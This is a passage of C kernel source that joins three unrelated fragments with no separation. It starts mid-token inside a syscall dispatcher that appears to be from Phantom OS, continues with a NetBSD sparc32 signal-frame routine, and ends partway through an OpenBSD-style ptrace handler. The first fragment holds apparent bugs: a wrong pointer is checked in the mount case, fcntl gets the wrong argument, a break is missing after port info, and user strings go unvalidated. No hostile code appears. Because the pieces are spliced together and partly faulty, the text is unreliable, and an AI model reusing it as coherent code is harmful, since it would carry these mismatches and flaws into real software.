n2 ); break; } case SYS_getcwd: { AARG(char *, buf, 0, uarg[1]); ret = usys_getcwd( &err, u, buf, uarg[1] ); break; } case SYS_mkdir: { AARG(const char *, path, 0, 2); ret = usys_mkdir( &err, u, path ); break; } case SYS_link: case SYS__llseek: case SYS_chroot: case SYS_lstat64: case SYS_mknod: goto unimpl; case SYS_mount: { const char *source = adjustin( uarg[0], st ); CHECKA(source,0); const char *target = adjustin( uarg[1], st ); CHECKA(target,0); const char *fstype = adjustin( uarg[2], st ); CHECKA(target,0); const void *data = adjustin( uarg[4], st ); CHECKA(data,0); ret = usys_mount(&err, u, source, target, fstype, uarg[3], data ); break; } case SYS_umount: { const char *target = adjustin( uarg[0], st ); CHECKA(target,0); ret = usys_umount(&err, u, target, 0 ); break; } /* case SYS_umount2: { const char *target = adjustin( uarg[0], st ); CHECKA(target); ret = usys_umount(&err, u, target, uarg[1] ); break; } */ case SYS_truncate: { AARG(const char *, path, 0, 0); ret = usys_truncate(&err, u, path, uarg[1] ); break; } case SYS_ftruncate: { ret = usys_ftruncate(&err, u, uarg[0], uarg[1] ); break; } case SYS_truncate64: case SYS_ftruncate64: goto unimpl; case SYS_fchdir: ret = usys_fchdir( &err, u, uarg[0] ); break; case SYS_readdir: { AARG(struct dirent *, ent, 1, sizeof(struct dirent)); ret = usys_readdir( &err, u, uarg[0], ent ); break; } case SYS_fchmod: ret = usys_fchmod( &err, u, uarg[0], uarg[1] ); break; case SYS_fchown: case SYS_fchown32: ret = usys_fchown( &err, u, uarg[0], uarg[1], uarg[2] ); break; case SYS_fcntl: { //AARG(void *, str, 2, sizeof(int)); // FIXME size of arg? ret = usys_fcntl( &err, u, uarg[0], uarg[1], uarg[0] ); } break; case SYS_fcntl64: case SYS_fdatasync: case SYS_flock: case SYS_fstat64: case SYS_fstatfs: case SYS_fsync: case SYS_utime: case SYS_chmod: case SYS_chown: case SYS_chown32: case SYS_access: case SYS_lchown: case SYS_lchown32: case SYS_pread: case SYS_pwrite: goto unimpl; case SYS_readv: { int fd = uarg[0]; int iovcnt = uarg[2]; AARG(struct iovec *, list, 1, sizeof(struct iovec) * iovcnt); unsigned int onerc; int lp; for( lp = 0; lp < iovcnt; lp++ ) { void *addr = adjustin( list[lp].iov_base, st ); CHECKA(addr,list[lp].iov_len); onerc = usys_read(&err, u, fd, addr, list[lp].iov_len ); /* if( onerc < 0 ) { ret = -1; goto err_ret; } */ ret += onerc; if( onerc < list[lp].iov_len ) break; } break; } case SYS_writev: { int fd = uarg[0]; int iovcnt = uarg[2]; AARG(struct iovec *, list, 1, sizeof(struct iovec) * iovcnt); unsigned int onerc; int lp; for( lp = 0; lp < iovcnt; lp++ ) { void *addr = adjustin( list[lp].iov_base, st ); CHECKA(addr,list[lp].iov_len); onerc = usys_write(&err, u, fd, addr, list[lp].iov_len ); /* if( onerc < 0 ) { ret = -1; goto err_ret; } */ ret += onerc; if( onerc < list[lp].iov_len ) break; } break; } case SYS_readlink: goto unimpl; case SYS_gethostname: { int len = uarg[1]; char *target = adjustin( uarg[0], st ); CHECKA(target,len); ret = usys_gethostname(&err, u, target, len ); break; } case SYS_sethostname: { int len = uarg[1]; const char *target = adjustin( uarg[0], st ); CHECKA(target,len); ret = usys_sethostname(&err, u, target, len ); break; } case SYS_socket: ret = usys_socket( &err, u, uarg[0], uarg[1], uarg[2] ); break; case SYS_setsockopt: { socklen_t optlen = uarg[4]; AARG(const void *, optval, 3, optlen); ret = usys_setsockopt( &err, u, uarg[0], uarg[1], uarg[2], optval, optlen); break; } case SYS_getsockopt: { AARG(socklen_t *, optlen, 4, sizeof(socklen_t)); AARG(void *, optval, 3, *optlen); ret = usys_getsockopt( &err, u, uarg[0], uarg[1], uarg[2], optval, optlen); break; } case SYS_getpeername: { AARG(socklen_t *, namelen, 2, sizeof(socklen_t)); AARG(struct sockaddr *, name, 1, *namelen); ret = usys_getpeername( &err, u, uarg[0], name, namelen); break; } case SYS_getsockname: { AARG(socklen_t *, namelen, 2, sizeof(socklen_t)); AARG(struct sockaddr *, name, 1, *namelen); ret = usys_getsockname( &err, u, uarg[0], name, namelen); break; } case SYS_bind: { AARG(const struct sockaddr *, addr, 1, sizeof(struct sockaddr)); ret = usys_bind( &err, u, uarg[0], addr, uarg[2] ); break; } case SYS_listen: ret = usys_listen( &err, u, uarg[0], uarg[1] ); break; case SYS_accept: { AARG( socklen_t *, len, 2, sizeof(socklen_t)); AARG( struct sockaddr *, acc_addr, 1, *len ); ret = usys_accept( &err, u, uarg[0], acc_addr, len ); break; } case SYS_recv: { int len = uarg[2]; AARG( void *, buf, 0, len ); ret = usys_recv( &err, u, uarg[0], buf, len, uarg[3] ); break; } case SYS_recvmsg: { AARG( struct msghdr *, msg, 0, sizeof(struct msghdr) ); ret = usys_recvmsg( &err, u, uarg[0], msg, uarg[2] ); break; } case SYS_send: { int len = uarg[2]; AARG( const void *, buf, 0, len ); ret = usys_send( &err, u, uarg[0], buf, len, uarg[3] ); break; } case SYS_sendmsg: { AARG( const struct msghdr *, msg, 0, sizeof(struct msghdr) ); ret = usys_sendmsg( &err, u, uarg[0], msg, uarg[2] ); break; } case SYS_sendto: { socklen_t tolen = uarg[5]; AARG( const struct sockaddr *, to, 4, tolen ); int len = uarg[2]; AARG( const void *, buf, 0, len ); ret = usys_sendto( &err, u, uarg[0], buf, len, uarg[3], to, tolen ); break; } case SYS_recvfrom: { AARG( socklen_t *, fromlen, 5, sizeof(socklen_t) ); AARG( struct sockaddr *, from, 4, *fromlen ); int len = uarg[2]; AARG( void *, buf, 0, len ); ret = usys_recvfrom( &err, u, uarg[0], buf, len, uarg[3], from, fromlen ); break; } case SYS_connect: // int connect(int socket, const struct sockaddr *address, socklen_t address_len); { int len = uarg[2]; AARG( struct sockaddr *, acc_addr, 1, len ); ret = usys_connect( &err, u, uarg[0], acc_addr, len ); break; } case SYS_socketpair: { AARG( int *, sv, 3, sizeof(int) * 2 ); ret = usys_socketpair( &err, u, uarg[0], uarg[1], uarg[2], sv ); break; } case SYS_sendfile: case SYS_socketcall: goto unimpl; case SYS_nice: { // int nice = uarg[0]; // set thr prio // break; goto unimpl; } case SYS_brk: goto unimpl; /*{ ret = usys_sbrk( &err, u, uarg[0] ); break; }*/ case SYS_fork: case SYS_vfork: goto unimpl; case SYS_ioctl: { void *data = adjustin( uarg[2], st ); CHECKA(data,0); ret = usys_ioctl( &err, u, uarg[0], uarg[1], data, uarg[3] ); break; } int statlink; case SYS_lstat: statlink = 1; goto dostat; case SYS_stat: statlink = 0; goto dostat; dostat: { const char *path = adjustin( uarg[0], st ); CHECKA(path,0); struct stat *data = adjustin( uarg[1], st ); CHECKA(data,sizeof(struct stat)); ret = usys_stat( &err, u, path, data, statlink ); break; } case SYS_fstat: { struct stat *data = adjustin( uarg[1], st ); CHECKA(data,sizeof(struct stat)); ret = usys_fstat( &err, u, uarg[0], data, 0 ); break; } case SYS_umask: { ret = u->umask; u->umask = uarg[0]; break; } case SYS_kill: { ret = usys_kill( &err, u, uarg[0], uarg[1] ); break; } case SYS_waitpid: { AARG(int *, addr, 1, sizeof(int)); ret = usys_waitpid( &err, u, uarg[0], addr, uarg[2] ); break; } case SYS_wait: { AARG(int *, addr, 0, sizeof(int)); ret = usys_waitpid( &err, u, -1, addr, 0 ); break; } case SYS_clone: goto unimpl; case SYS_madvise: case SYS_mincore: case SYS_mlock: case SYS_mlockall: case SYS_mmap: case SYS_mprotect: case SYS_mremap: case SYS_msync: case SYS_munlock: case SYS_munlockall: case SYS_munmap: goto unimpl; // NewOS/BeOS/Haiku case SYS_create_port: { // TODO check string length and final addr to be valid AARG(const char *, name, 1, 0); ret = port_create( uarg[0], name ); break; } case SYS_close_port: ret = port_close( uarg[0] ); break; case SYS_delete_port: ret = port_delete( uarg[0] ); break; case SYS_find_port: { // TODO check string length and final addr to be valid AARG(const char *, name, 0, 0); ret = port_find(name); break; } case SYS_get_port_info: { AARG(struct port_info *, info, 1, sizeof(struct port_info)); ret = port_get_info( uarg[0], info); } case SYS_get_port_bufsize: ret = port_buffer_size( uarg[0] ); break; case SYS_get_port_bufsize_etc: ret = port_buffer_size_etc( uarg[0], uarg[1], uarg[2] ); break; case SYS_get_port_count: ret = port_count( uarg[0] ); break; case SYS_read_port: { AARG(int32_t *, msg_code, 1, sizeof(int32_t)); AARG(void *, msg_buffer, 2, uarg[3]); ret = port_read( uarg[0], msg_code, msg_buffer, uarg[3]); break; } case SYS_write_port: { //AARG(int32_t *, msg_code, 1, sizeof(int32_t)); //AARG(int32_t, msg_code, 1, sizeof(int32_t)); AARG(void *, msg_buffer, 2, uarg[3]); ret = port_write( uarg[0], uarg[1], msg_buffer, uarg[3]); break; } case SYS_read_port_etc: case SYS_write_port_etc: case SYS_set_port_owner: case SYS_get_next_port_info: goto unimpl; case SYS_phantom_run: { // extern int phantom_run(const char *fname, const char **argv, const char **envp, int flags); AARG(const char *, fname, 0, 1); AARG(const char **, uav, 1, 4); AARG(const char **, uep, 2, 4); if( 0 == uarg[1] ) uav = 0; if( 0 == uarg[2] ) uep = 0; SHOW_FLOW( 2, "run %s flags 0x%b", fname, uarg[3], "\020\1<WAIT>\2<NEWWIN>\3<NEWPGRP>" ); char *a[1024]; char *e[1024]; SHOW_FLOW( 2, "run %s load args", fname ); if( user_args_load( mina, maxa, a, 1024, uav ) || user_args_load( mina, maxa, e, 1024, uep ) ) { ret = -1; err = EFAULT; SHOW_ERROR( 0, "fault reading args for %s", fname ); goto err_ret; } ret = usys_run( &err, u, fname, (const char**)a, (const char**)e, uarg[3] ); break; } case SYS_phantom_method: // AARG(const char *, m_name, 0, 1); // int nfd = aarg[1]; // AARG(int *, fds, 0, sizeof(int)*nfd); // ret = usys_pmethod( &err, u, m_name, int nfd, int fds[] ); case SYS_phantom_toobject: case SYS_phantom_fromobject: case SYS_phantom_intmethod: case SYS_phantom_strmethod: goto unimpl; // extern int phantom_runclass(const char *cname, int nmethod, int flags); case SYS_phantom_runclass: { AARG(const char *, cname, 0, 1); unsigned flags = uarg[2]; if(flags) SHOW_ERROR( 0, "SYS_phantom_runclass: unknown flags %x" , flags ); usys_phantom_runclass( &err, u, cname, uarg[1] ); ret = err; } break; case SYS_setproperty: { AARG(const char *, pName, 1, 1); // TODO check zero term string! AARG(const char *, pValue, 2, 1); usys_setproperty( &err, u, uarg[0], pName, pValue ); ret = err; } break; case SYS_getproperty: { AARG(const char *, pName, 1, 1); // TODO check zero term string! AARG(char *, pValue, 2, uarg[3]); usys_getproperty( &err, u, uarg[0], pName, pValue, uarg[3] ); ret = err; } break; case SYS_listproperties: { AARG(char *, buf, 2, uarg[3]); usys_listproperties( &err, u, uarg[0], uarg[1], buf, uarg[3] ); ret = err; } break; case SYS_name2ip: { AARG(in_addr_t *, out, 0, sizeof(in_addr_t)); AARG(const char *, name, 1, 1); ret = name2ip( out, name, uarg[2] ); if( ret != 0 ) err = ret; } break; case SYS_sigpending: { AARG(sigset_t *, set, 0, sizeof(sigset_t *)); ret = usys_sigpending( &err, u, set); break; } case SYS_signal: { #if 0 AARG(sighandler_t, hand, 1, sizeof(sighandler_t)); hand = usys_signal( &err, u, uarg[0], hand); // FIXME 64 bit error ret = ((int)hand) - mina; // Convert pointer back #else // We do not use pointer (ret and uarg 1), so we don't have to convert it ret = (int)usys_signal( &err, u, uarg[0], (void *)uarg[1]); #endif break; } case SYS_sigprocmask: //case raise: case SYS_sigaction: case SYS_siginterrupt: case SYS_sigsuspend: goto unimpl; unimpl: SHOW_ERROR( 0, "Unimplemented syscall %d called", callno ); err = ENOSYS; break; default: SHOW_ERROR( 0, "Unknown syscall %d called", callno ); err = ENOSYS; break; } #else // HAVE_UNIX int err = ENOSYS; int ret = -1; goto err_ret; // to clear warning #endif // HAVE_UNIX err_ret: #ifdef ARCH_ia32 #define _RET_OK st->eax = ret; st->edx = err; #endif #ifdef ARCH_mips #define _RET_OK st->r2 = ret; // v0 (normal ret register, low) st->r3 = err; // v1 (normal ret register, hi) #endif #ifdef ARCH_arm #define _RET_OK st->r0 = ret; // normal ret register st->r1 = err; // arg1 reg, we can safely use for return of errno #endif #ifndef _RET_OK #error arch ret #endif }
static void netbsd32_sendsig_sigcontext(const ksiginfo_t *ksi, const sigset_t *mask) { int sig = ksi->ksi_signo; struct lwp *l = curlwp; struct proc *p = l->l_proc; struct sparc32_sigframe *fp; struct trapframe64 *tf; int addr, onstack, error; struct rwindow32 *oldsp, *newsp; sig_t catcher = SIGACTION(p, sig).sa_handler; struct sparc32_sigframe sf; extern char netbsd32_sigcode[], netbsd32_esigcode[]; #define szsigcode (netbsd32_esigcode - netbsd32_sigcode) tf = l->l_md.md_tf; /* Need to attempt to zero extend this 32-bit pointer */ oldsp = (struct rwindow32 *)(u_long)(u_int)tf->tf_out[6]; /* Do we need to jump onto the signal stack? */ onstack = (l->l_sigstk.ss_flags & (SS_DISABLE | SS_ONSTACK)) == 0 && (SIGACTION(p, sig).sa_flags & SA_ONSTACK) != 0; if (onstack) { fp = (struct sparc32_sigframe *)((char *)l->l_sigstk.ss_sp + l->l_sigstk.ss_size); l->l_sigstk.ss_flags |= SS_ONSTACK; } else fp = (struct sparc32_sigframe *)oldsp; fp = (struct sparc32_sigframe *)((u_long)(fp - 1) & ~7); #ifdef DEBUG sigpid = p->p_pid; if ((sigdebug & SDB_KSTACK) && p->p_pid == sigpid) { printf("sendsig: %s[%d] sig %d newusp %p scp %p oldsp %p\n", p->p_comm, p->p_pid, sig, fp, &fp->sf_sc, oldsp); if (sigdebug & SDB_DDB) Debugger(); } #endif /* * Now set up the signal frame. We build it in kernel space * and then copy it out. We probably ought to just build it * directly in user space.... */ sf.sf_signo = sig; sf.sf_code = (u_int)ksi->ksi_trap; #if defined(COMPAT_SUNOS) || defined(MODULAR) sf.sf_scp = (u_long)&fp->sf_sc; #endif sf.sf_addr = 0; /* XXX */ /* * Build the signal context to be used by sigreturn. */ sf.sf_sc.sc_onstack = onstack; sf.sf_sc.sc_mask = *mask; sf.sf_sc.sc_sp = (u_long)oldsp; sf.sf_sc.sc_pc = tf->tf_pc; sf.sf_sc.sc_npc = tf->tf_npc; sf.sf_sc.sc_psr = TSTATECCR_TO_PSR(tf->tf_tstate); /* XXX */ sf.sf_sc.sc_g1 = tf->tf_global[1]; sf.sf_sc.sc_o0 = tf->tf_out[0]; /* * Put the stack in a consistent state before we whack away * at it. Note that write_user_windows may just dump the * registers into the pcb; we need them in the process's memory. * We also need to make sure that when we start the signal handler, * its %i6 (%fp), which is loaded from the newly allocated stack area, * joins seamlessly with the frame it was in when the signal occurred, * so that the debugger and _longjmp code can back up through it. */ sendsig_reset(l, sig); mutex_exit(p->p_lock); newsp = (struct rwindow32 *)((long)fp - sizeof(struct rwindow32)); write_user_windows(); #ifdef DEBUG if ((sigdebug & SDB_KSTACK)) printf("sendsig: saving sf to %p, setting stack pointer %p to %p\n", fp, &(((struct rwindow32 *)newsp)->rw_in[6]), oldsp); #endif error = (rwindow_save(l) || copyout((void *)&sf, (void *)fp, sizeof sf) || suword(&(((struct rwindow32 *)newsp)->rw_in[6]), (u_long)oldsp)); mutex_enter(p->p_lock); if (error) { /* * Process has trashed its stack; give it an illegal * instruction to halt it in its tracks. */ #ifdef DEBUG mutex_exit(p->p_lock); if ((sigdebug & SDB_KSTACK) && p->p_pid == sigpid) printf("sendsig: window save or copyout error\n"); printf("sendsig: stack was trashed trying to send sig %d, sending SIGILL\n", sig); if (sigdebug & SDB_DDB) Debugger(); mutex_enter(p->p_lock); #endif sigexit(l, SIGILL); /* NOTREACHED */ } #ifdef DEBUG if (sigdebug & SDB_FOLLOW) { printf("sendsig: %s[%d] sig %d scp %p\n", p->p_comm, p->p_pid, sig, &fp->sf_sc); } #endif /* * Arrange to continue execution at the code copied out in exec(). * It needs the function to call in %g1, and a new stack pointer. */ addr = p->p_psstrp - szsigcode; tf->tf_global[1] = (long)catcher; tf->tf_pc = addr; tf->tf_npc = addr + 4; tf->tf_out[6] = (uint64_t)(u_int)(u_long)newsp; /* Remember that we're now on the signal stack. */ if (onstack) l->l_sigstk.ss_flags |= SS_ONSTACK; #ifdef DEBUG if ((sigdebug & SDB_KSTACK) && p->p_pid == sigpid) { mutex_exit(p->p_lock); printf("sendsig: about to return to catcher %p thru %p\n", catcher, addr); if (sigdebug & SDB_DDB) Debugger(); mutex_enter(p->p_lock); } #endif }
/* * Process debugging system call. */ int sys_ptrace(struct proc *p, void *v, register_t *retval) { struct sys_ptrace_args /* { syscallarg(int) req; syscallarg(pid_t) pid; syscallarg(caddr_t) addr; syscallarg(int) data; } */ *uap = v; struct proc *t; /* target thread */ struct process *tr; /* target process */ struct uio uio; struct iovec iov; struct ptrace_io_desc piod; struct ptrace_event pe; struct ptrace_thread_state pts; struct reg *regs; #if defined (PT_SETFPREGS) || defined (PT_GETFPREGS) struct fpreg *fpregs; #endif #if defined (PT_SETXMMREGS) || defined (PT_GETXMMREGS) struct xmmregs *xmmregs; #endif int error, write; int temp; int req = SCARG(uap, req); int s; /* "A foolish consistency..." XXX */ switch (req) { case PT_TRACE_ME: t = p; break; /* calls that only operate on the PID */ case PT_READ_I: case PT_READ_D: case PT_WRITE_I: case PT_WRITE_D: case PT_KILL: case PT_ATTACH: case PT_IO: case PT_SET_EVENT_MASK: case PT_GET_EVENT_MASK: case PT_GET_PROCESS_STATE: case PT_GET_THREAD_FIRST: case PT_GET_THREAD_NEXT: default: /* Find the process we're supposed to be operating on. */ if ((t = pfind(SCARG(uap, pid))) == NULL) return (ESRCH); if (t->p_flag & P_THREAD) return (ESRCH); break; /* calls that accept a PID or a thread ID */ case PT_CONTINUE: case PT_DETACH: #ifdef PT_STEP case PT_STEP: #endif case PT_GETREGS: case PT_SETREGS: #ifdef PT_GETFPREGS case PT_GETFPREGS: #endif #ifdef PT_SETFPREGS case PT_SETFPREGS: #endif #ifdef PT_GETXMMREGS case PT_GETXMMREGS: #endif #ifdef PT_SETXMMREGS case PT_SETXMMREGS: #endif if (SCARG(uap, pid) > THREAD_PID_OFFSET) { t = pfind(SCARG(uap, pid) - THREAD_PID_OFFSET); if (t == NULL) return (ESRCH); } else { if ((t = pfind(SCARG(uap, pid))) == NULL) return (ESRCH); if (t->p_flag & P_THREAD) return (ESRCH); } break; } tr = t->p_p; if ((tr->ps_flags & PS_INEXEC) != 0) return (EAGAIN); /* Make sure we can operate on it. */ switch (req) { case PT_TRACE_ME: /* Saying that you're being traced is always legal. */ break; case PT_ATTACH: /* * You can't attach to a process if: * (1) it's the process that's doing the attaching, */ if (tr == p->p_p) return (EINVAL); /* * (2) it's a system process */ if (ISSET(t->p_flag, P_SYSTEM)) return (EPERM); /* * (3) it's already being traced, or */ if (ISSET(tr->ps_flags, PS_TRACED)) return (EBUSY); /* * (4) it's not owned by you, or the last exec * gave us setuid/setgid privs (unless * you're root), or... * * [Note: once PS_SUGID or PS_SUGIDEXEC gets set in * execve(), they stay set until the process does * another execve(). Hence this prevents a setuid * process which revokes its special privileges using * setuid() from being traced. This is good security.] */ if ((tr->ps_ucred->cr_ruid != p->p_ucred->cr_ruid || ISSET(tr->ps_flags, PS_SUGIDEXEC | PS_SUGID)) && (error = suser(p, 0)) != 0) return (error); /* * (5) ...it's init, which controls the security level * of the entire system, and the system was not * compiled with permanently insecure mode turned * on. */ if ((tr->ps_pid == 1) && (securelevel > -1)) return (EPERM); /* * (6) it's an ancestor of the current process and * not init (because that would create a loop in * the process graph). */ if (tr->ps_pid != 1 && inferior(p->p_p, tr)) return (EINVAL); break; case PT_READ_I: case PT_READ_D: case PT_WRITE_I: case PT_WRITE_D: case PT_IO: case PT_CONTINUE: case PT_KILL: case PT_DETACH: #ifdef PT_STEP case PT_STEP: #endif case PT_SET_EVENT_MASK: case PT_GET_EVENT_MASK: case PT_GET_PROCESS_STATE: case PT_GETREGS: case PT_SETREGS: #ifdef PT_GETFPREGS case PT_GETFPREGS: #endif #ifdef PT_SETFPREGS case PT_SETFPREGS: #endif #ifdef PT_GETXMMREGS case PT_GETXMMREGS: #endif #ifdef PT_SETXMMREGS case PT_SETXMMREGS: #endif /* * You can't do what you want to the process if: * (1) It's not being traced at all, */ if (!ISSET(tr->ps_flags, PS_TRACED)) return (EPERM); /* * (2) it's not being traced by _you_, or */ if (tr->ps_pptr != p->p_p) return (EBUSY); /* * (3) it's not currently stopped. */ if (t->p_stat != SSTOP || !ISSET(tr->ps_flags, PS_WAITED)) return (EBUSY); break; case PT_GET_THREAD_FIRST: case PT_GET_THREAD_NEXT: /* * You can't do what you want to the process if: * (1) It's not being traced at all, */ if (!ISSET(tr->ps_flags, PS_TRACED)) return (EPERM); /* * (2) it's not being traced by _you_, or */ if (tr->ps_pptr != p->p_p) return (EBUSY); /* * Do the work here because the request isn't actually * associated with 't' */ if (SCARG(uap, data) != sizeof(pts)) return (EINVAL); if (req == PT_GET_THREAD_NEXT) { error = copyin(SCARG(uap, addr), &pts, sizeof(pts)); if (error) return (error); t = pfind(pts.pts_tid - THREAD_PID_OFFSET); if (t == NULL || ISSET(t->p_flag, P_WEXIT)) return (ESRCH); if (t->p_p != tr) return (EINVAL); t = TAILQ_NEXT(t, p_thr_link); } else { t = TAILQ_FIRST(&tr->ps_threads); } if (t == NULL) pts.pts_tid = -1; else pts.pts_tid = t->p_pid + THREAD_PID_OFFSET; return (copyout(&pts, SCARG(uap, addr), sizeof(pts))); default: /* It was not a legal request. */ return (EINVAL); } /* Do single-step fixup if needed. */ FIX_SSTEP(t); /* Now do the operation. */ write = 0; *retval = 0; switch (req) { case PT_TRACE_ME: /* Just set the trace flag. */ atomic_setbits_int(&tr->ps_flags, PS_TRACED); tr->ps_oppid = tr->ps_pptr->ps_pid; if (tr->ps_ptstat == NULL) tr->ps_ptstat = malloc(sizeof(*tr->ps_ptstat), M_SUBPROC, M_WAITOK); memset(tr->ps_ptstat, 0, sizeof(*tr->ps_ptstat)); return (0); case PT_WRITE_I: /* XXX no separate I and D spaces */ case PT_WRITE_D: write = 1; temp = SCARG(uap, data); case PT_READ_I: /* XXX no separate I and D spaces */ case PT_READ_D: /* write = 0 done above. */ iov.iov_base = (caddr_t)&temp; iov.iov_len = sizeof(int); uio.uio_iov = &iov; uio.uio_iovcnt = 1; uio.uio_offset = (off_t)(vaddr_t)SCARG(uap, addr); uio.uio_resid = sizeof(int); uio.uio_segflg = UIO_SYSSPACE; uio.uio_rw = write ? UIO_WRITE : UIO_READ; uio.uio_procp = p; error = process_domem(p, t, &uio, write ? PT_WRITE_I : PT_READ_I); if (write == 0) *retval = temp; return (error); case PT_IO: error = copyin(SCARG(uap, addr), &piod, sizeof(piod)); if (error) return (error); iov.iov_base = piod.piod_addr; iov.iov_len = piod.piod_len; uio.uio_iov = &iov; uio.uio_iovcnt = 1; uio.uio_offset = (off_t)(vaddr_t)piod.piod_offs; uio.uio_resid = piod.piod_len; uio.uio_segflg = UIO_USERSPACE; uio.uio_procp = p; switch (piod.piod_op) { case PIOD_READ_I: req = PT_READ_I; uio.uio_rw = UIO_READ; break; case PIOD_READ_D: req = PT_READ_D; uio.uio_rw = UIO_READ; break; case PIOD_WRITE_I: req = PT_WRITE_I; uio.uio_rw = UIO_WRITE; break; case PIOD_WRITE_D: req = PT_WRITE_D; uio.uio_rw = UIO_WRITE; break; case PIOD_READ_AUXV: req = PT_READ_D; uio.uio_rw = UIO_READ; temp = tr->ps_emul->e_arglen * sizeof(char *); if (uio.uio_offset > temp) return (EIO); if (uio.uio_resid > temp - uio.uio_offset) uio.uio_resid = temp - uio.uio_offset; piod.piod_len = iov.iov_len = uio.uio_resid; error = process_auxv_offset(p, t, &uio); if (error) return (error); break; default: return (EINVAL); } error = process_domem(p, t, &uio, req); piod.piod_len -= uio.uio_resid; (void) copyout(&piod, SCARG(uap, addr), sizeof(piod)); return (error); #ifdef PT_STEP case PT_STEP: /* * From the 4.4BSD PRM: * "Execution continues as in request PT_CONTINUE; however * as soon as possible after execution of at least one * instruction, execution stops again. [ ... ]" */ #endif case PT_CONTINUE: /* * From the 4.4BSD PRM: * "The data argument is taken as a signal number and the * child's execution continues at location addr as if it * incurred that signal. Normally the signal number will * be either 0 to indicate that the signal that caused the * stop should be ignored, or that value fetched out of * the process's image indicating which signal caused * the stop. If addr is (int *)1 then execution continues * from where it stopped." */ if (SCARG(uap, pid) < THREAD_PID_OFFSET && tr->ps_single) t = tr->ps_single; /* Check that the data is a valid signal number or zero. */ if (SCARG(uap, data) < 0 || SCARG(uap, data) >= NSIG) return (EINVAL); /* If the address parameter is not (int *)1, set the pc. */ if ((int *)SCARG(uap, addr) != (int *)1) if ((error = process_set_pc(t, SCARG(uap, addr))) != 0) goto relebad; #ifdef PT_STEP /* * Arrange for a single-step, if that's requested and possible. */ error = process_sstep(t, req == PT_STEP); if (error) goto relebad; #endif goto sendsig; case PT_DETACH: /* * From the 4.4BSD PRM: * "The data argument is taken as a signal number and the * child's execution continues at location addr as if it * incurred that signal. Normally the signal number will * be either 0 to indicate that the signal that caused the * stop should be ignored, or that value fetched out of * the process's image indicating which signal caused * the stop. If addr is (int *)1 then execution continues * from where it stopped." */ if (SCARG(uap, pid) < THREAD_PID_OFFSET && tr->ps_single) t = tr->ps_single; /* Check that the data is a valid signal number or zero. */ if (SCARG(uap, data) < 0 || SCARG(uap, data) >= NSIG) return (EINVAL); #ifdef PT_STEP /* * Arrange for a single-step, if that's requested and possible. */ error = process_sstep(t, req == PT_STEP); if (error) goto relebad; #endif /* give process back to original parent or init */ if (tr->ps_oppid != tr->ps_pptr->ps_pid) { struct process *ppr; ppr = prfind(tr->ps_oppid); proc_reparent(tr, ppr ? ppr : initproc->p_p); } /* not being traced any more */ tr->ps_oppid = 0; atomic_clearbits_int(&tr->ps_flags, PS_TRACED|PS_WAITED); sendsig: memset(tr->ps_ptstat, 0, sizeof(*tr->ps_ptstat)); /* Finally, deliver the requested signal (or none). */ if (t->p_stat == SSTOP) { t->p_xstat = SCARG(uap, data); SCHED_LOCK(s); setrunnable(t); SCHED_UNLOCK(s); } else { if (SCARG(uap, data) != 0) psignal(t, SCARG(uap, data)); } return (0); relebad: return (error); case PT_KILL: if (SCARG(uap, pid) < THREAD_PID_OFFSET && tr->ps_single) t = tr->ps_single; /* just send the process a KILL signal. */ SCARG(uap, data) = SIGKILL; goto sendsig; /* in PT_CONTINUE, above. */ case PT_ATTACH: /* * Go ahead and set the trace flag. * Save the old parent (it's reset in * _DETACH, and also in kern_exit.c:wait4() * Reparent the process so that the tracing * proc gets to see all the action. * Stop the target. */ atomic_setbits_int(&tr->ps_flags, PS_TRACED); tr->ps_oppid = tr->ps_pptr->ps_pid; if (tr->ps_pptr != p->p_p) proc_reparent(tr, p->p_p); if (tr->ps_ptstat == NULL) tr->ps_ptstat = malloc(sizeof(*tr->ps_ptstat), M_SUBPROC, M_WAITOK); SCARG(uap, data) = SIGSTOP; goto sendsig; case PT_GET_EVENT_MASK: if (SCARG(uap, data) != sizeof(pe)) return (EINVAL); memset(&pe, 0, sizeof(pe)); pe.pe_set_event = tr->ps_ptmask; return (copyout(&pe, SCARG(uap, addr), sizeof(pe))); case PT_SET_EVENT_MASK: if (SCARG(uap, data) != sizeof(pe)) return (EINVAL); if ((error = copyin(SCARG(uap, addr), &pe, sizeof(pe)))) return (error); tr->ps_ptmask = pe.pe_set_event; return (0); case PT_GET_PROCESS_STATE: if (SCARG(uap, data) != sizeof(*tr->ps_ptstat)) return (EINVAL); if (tr->ps_single) tr->ps_ptstat->pe_tid = tr->ps_single->p_pid + THREAD_PID_OFFSET; return (copyout(tr->ps_ptstat, SCARG(uap, addr), sizeof(*tr->ps_ptstat))); case PT_SETREGS: KASSERT((p->p_flag & P_SYSTEM) == 0); if ((error = process_checkioperm(p, tr)) != 0) return (error); regs = malloc(sizeof(*regs), M_TEMP, M_WAITOK); error = copyin(SCARG(uap, addr), regs, sizeof(*regs)); if (error == 0) { error = process_write_regs(t, regs); } free(regs, M_TEMP); return (error); case PT_GETREGS: KASSERT((p->p_flag & P_SYSTEM) == 0); if ((error = process_checkioperm(p, tr)) != 0) return (error); regs = malloc(sizeof(*regs), M_TEMP, M_WAITOK); error = process_read_regs(t, regs); if (error == 0) error = copyout(regs, SCARG(uap, addr), sizeof (*regs)); free(regs, M_TEMP); return (error); #ifdef PT_SETFPREGS case PT_SETFPREGS: KASSERT((p->p_flag & P_SYSTEM) == 0); if ((error = process_checkioperm(p, tr)) != 0) return (error); fpregs = malloc(sizeof(*fpregs), M_TEMP, M_WAITOK); error = copyin(SCARG(uap, addr), fpregs, sizeof(*fpregs)); if (error == 0) { error = process_write_fpregs(t, fpregs); } free(fpregs, M_TEMP); return (error); #endif #ifdef PT_GETFPREGS case PT_GETFPREGS: KASSERT((p->p_flag & P_SYSTEM) == 0); if ((error = process_checkioperm(p, tr)) != 0) return (error); fpregs = malloc(sizeof(*fpregs), M_TEMP, M_WAITOK); error = process_read_fpregs(t, fpregs); if (error == 0) error = copyout(fpregs, SCARG(uap, addr), sizeof(*fpregs)); free(fpregs, M_TEMP); return (error); #endif #ifdef PT_SETXMMREGS case PT_SETXMMREGS: KASSERT((p->p_flag & P_SYSTEM) == 0); if ((error = process_checkioperm(p, tr)) != 0) return (error); xmmregs = malloc(sizeof(*xmmregs), M_TEMP, M_WAITOK); error = copyin(SCARG(uap, addr), xmmregs, sizeof(*xmmregs)); if (error == 0) { error = process_write_xmmregs(t, xmmregs); } free(xmmregs, M_TEMP); return (error); #endif #ifdef PT_GETXMMREGS case PT_GETXMMREGS: KASSERT((p->p_flag & P_SYSTEM) == 0); if ((error = process_checkioperm(p, tr)) != 0) return (error); xmmregs = malloc(sizeof(*xmmregs), M_TEMP, M_WAITOK); error = 